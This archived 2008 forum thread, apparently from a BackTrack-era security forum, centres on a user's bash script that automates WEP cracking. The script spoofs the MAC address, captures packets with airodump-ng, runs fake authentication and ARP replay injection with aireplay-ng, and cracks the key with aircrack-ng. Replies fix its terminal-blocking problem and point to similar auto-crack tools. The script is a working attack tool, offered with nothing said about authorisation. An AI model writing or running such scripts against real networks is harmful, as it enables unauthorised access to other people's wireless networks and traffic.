PDA

View Full Version : Help with auto-crack bash script



devilsson2010
08-21-2008, 11:33 PM
I wanted to make a bash script that would just basically run all of the wep cracking commands for me. The problem I'm having is that whenever I open a new konsole, the current one waits until that one closes, how to I avoid that?

This is what I have so far:


#!/bin/bash

clear

echo Enter the interface:
read INTERFACE

echo Enter the essid:
read ESSID

echo Enter the bssid:
read BSSID

echo Enter the channel:
read CH

echo Enter a file:
read FILE

echo Enter the mac:
read MAC

clear

airmon-ng stop $INTERFACE
ifconfig $INTERFACE down
macchanger --mac $MAC $INTERFACE
airmon-ng start $INTERFACE

konsole -e airodump-ng -c $CH -w $FILE --bssid $BSSID $INTERFACE

konsole --noclose -e aircrack-ng -b $BSSID $FILE+*.cap

aireplay-ng -1 0 -a $BSSID -h $MAC -e $ESSID $INTERFACE
aireplay-ng -3 -a $BSSID -h $MAC $INTERFACE

imported_wyze
08-21-2008, 11:52 PM
Use 'xterm -e <command>'

Reading a file is possible too, using `cat file`

Also this thread should be in "Programming"

devilsson2010
08-22-2008, 12:09 AM
That's better, thanks!

Edit:

It's still waiting for xterm to close before continuing. :(

imported_wyze
08-22-2008, 01:27 AM
That's better, thanks!

Edit:

It's still waiting for xterm to close before continuing. :(

so run (xterm -e command) & (xterm -e command)

opreat0r
08-22-2008, 08:39 AM
http://forums.remote-exploit.org/showthread.php?t=12767 the one I made for myself

nosrak113
09-08-2008, 06:05 AM
i like mine lol :)
only works with madwifi

code.google.com/p/autowep/

jamied_uk
09-08-2008, 11:27 AM
how do i make it login automattically ? into bt3 i have it installed on my hdd :D

jamied_uk
09-08-2008, 11:31 AM
does this code.google.com/p/autowep/
work for my intel pro 100 wirless ? and using bt3 ?

imported_=Tron=
09-08-2008, 11:39 AM
does this code.google.com/p/autowep/
work for my intel pro 100 wirless ? and using bt3 ?As stated two posts above yours, no it does not.

JoopKnoop
10-19-2008, 09:54 AM
Why don't you guys use the airoscript.sh (see locate airoscript.sh)?

Joop.

Talkie Toaster
10-30-2008, 08:55 AM
Because the English version is buggy as hell! :D

I use the Spanish version from time to time for a client-less wep test, but apart from that its a total pain in the ass......

Though maybe the OP should have a look at airoscript and see if he can pick up any coding hints or ideas.....

TT